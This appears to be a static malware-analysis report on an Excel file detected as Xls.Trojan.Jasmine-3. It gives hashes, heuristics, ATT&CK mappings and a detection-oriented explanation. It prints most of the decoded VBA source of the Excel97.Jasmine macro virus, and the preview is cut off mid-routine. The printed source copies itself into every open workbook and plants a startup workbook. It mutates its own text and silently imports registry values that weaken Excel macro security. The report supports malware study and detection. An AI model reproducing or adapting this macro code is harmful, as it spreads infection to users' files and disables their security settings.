Xls.Trojan.Jasmine-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 84474d527581c414…

MALICIOUS

Office (OLE)

25.0 KB · Created: 2002-03-10 21:54:29 · Authoring application: Microsoft Excel · First seen: 2012-06-14
MD5: ead3cd2940fbdf861772469c19ab0a8e · SHA-1: e853b77929d85ce37584e076682b842901329e75 · SHA-256: 84474d527581c414ac849e8626dd23e9d3b1d6e9804ab5d2dbbab295d89e01dc
200 Risk Score

Malware Insights

Xls.Trojan.Jasmine-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic · T1566.001 Spearphishing Attachment

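This Excel file contains VBA macros that ClamAV flags as malicious under the signature 'Xls.Trojan.Jasmine-3'. In the extracted preview, the single Shell() call runs `regedit /s` against 'c:\remove.reg', which is a temporary file path rather than a registry path: the macro writes the file itself and deletes it immediately afterwards with Kill. No download of additional payloads is visible in the previewed portion. The .reg content sets `Level` under the Office 9.0 Excel Security key, or `Options6` under the Office 8.0 Excel keys, which appears intended to weaken Excel's macro security settings rather than to clean up traces. The same macro also copies its own code into the ThisWorkbook and sheet modules of every open workbook, saves a BOOK1 workbook into the Excel startup folder when one is not already there, and rewrites every second line of its own body (lines 7 through 221) with random comment text, so the sample behaves as a self-replicating macro virus whose copies differ textually. For detection, Excel writing a .reg file to the drive root and then spawning regedit with the silent switch is a high-signal file and process event pair; the registry change additionally fits T1112 (Modify Registry) and T1562.001 (Impair Defenses: Disable or Modify Tools).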

Heuristics 3

  • ClamAV: Xls.Trojan.Jasmine-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Jasmine-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5630 bytes
SHA-256: 44c59cd9619981c9487d020e11ead85032edb40b1c65215f682aa6f635d1fd57
Detection
ClamAV: Xls.Trojan.Jasmine-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'Excel97.Jasmine v1.1
'Copyright (c) 1999, cry0tek

Public Start, CloseFlag As Boolean ' analyst note: only CloseFlag is typed Boolean; Start is an implicit Variant (As applies to the last name only). Both are read and set in Workbook_WindowDeactivate below.
'Jasmine
Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)

On Error Resume Next

RegFile = "c:\remove.reg"

For i = 1 To Workbooks.Count

 Set Inf = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule

 Randomize

 With Inf

  For x = 7 To 221 Step 2

   For y = 1 To Int((100 * Rnd) + 1)

    PolyVal = PolyVal + Chr(65 + Int(Rnd * 26)) & Chr(122 - Int(Rnd * 26)) & Chr(48 + Int(Rnd * 10))

   Next

   .replaceLine x, "'" & PolyVal

   PolyVal = ""

  Next

 End With

 If Inf.Lines(5, 1) = "'Jasmine" Then vx = Inf.Lines(1, Inf.countoflines)

 If Inf.countoflines > 100 Then GoTo out

 For j = 1 To Workbooks(i).VBProject.VBComponents.Count

  Set Item = Workbooks(i).VBProject.VBComponents.Item(j)

  InfName = Item.Name

  Set Infline = Item.CodeModule

  If InStr(1, InfName, "Sheet") Then

   If Infline.Lines(5, 1) = "'Jasmine" Then vx = Workbooks(i).VBProject.VBComponents.Item(j).CodeModule.Lines(1, Infline.countoflines)

  End If

  If Infline.countoflines > 100 Then GoTo out

 Next

Next

out:

If UCase(Dir(Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then

 If Start <> True Then

  Start = True: CloseFlag = True

  Workbooks.Add.SaveAs Filename:=Application.StartupPath & "\BOOK1.", FileFormat:=xlNormal, AddToMru:=False

 End If

End If

For i = 1 To Workbooks.Count

 Set Inf = Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule

 If Inf.Lines(5, 1) <> "'Jasmine" Then

  Inf.InsertLines 1, vx

  Inf.replaceLine 6, "Private Sub Workbook_WindowDeactivate(ByVal Wn As Excel.Window)"

 End If

  For ii = 1 To Workbooks(i).VBProject.VBComponents.Count

   Set Item = Workbooks(i).VBProject.VBComponents.Item(ii)

   InfName = Item.Name

   Set Infline = Item.CodeModule

   If Infline.Lines(5, 1) <> "'Jasmine" Then

    If InStr(1, InfName, "Sheet") Then

     Item.CodeModule.InsertLines 1, vx

     Item.CodeModule.replaceLine 6, "Private Sub WorkBook_Activate()"

    End If

   End If

  Next ii

Next i

If CloseFlag = True Then

 CloseFlag = False

 Workbooks("Book1.").Close savechanges:=True

 Open RegFile For Output As 1

 Print #1, "REGEDIT4"

 If Left(Application.Version, 1) = 9 Then

  Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"

  Print #1, """Level""=dword:00000001"

 Else

  Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"

  Print #1, """Options6""=dword:00000000"

  Print #1, "[HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User\Settings\Excel\Microsoft Excel]"

  Print #1, """Options6""=dword:00000000"

  Print #1, "[HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"

  Print #1, """Options6""=dword:00000000"

 End If

 Close 1

 Shell "regedit /s " & RegFile, vbHide

 Kill RegFile

End If

If Minute(Now) = Second(Now) Then

 Select Case Day(Now)

  Case 1 To 5 And Int((5 * Rnd) + 1) = 1

   Application.StatusBar = "Excel97.Jasmine v1.1"

  Case 6 To 10 And Int((5 * Rnd) + 1) = 1

   With Assistant.NewBalloon

    .Heading = "Excel97.Jasmine v1.1"

    .Text = "Since the only time I see her near" & vbCr & "Is when I close my eyes" & vbCr & "Should I keep it that way" & vbCr & "The only way I can make her stay..." & vbCr & vbCr

... (truncated)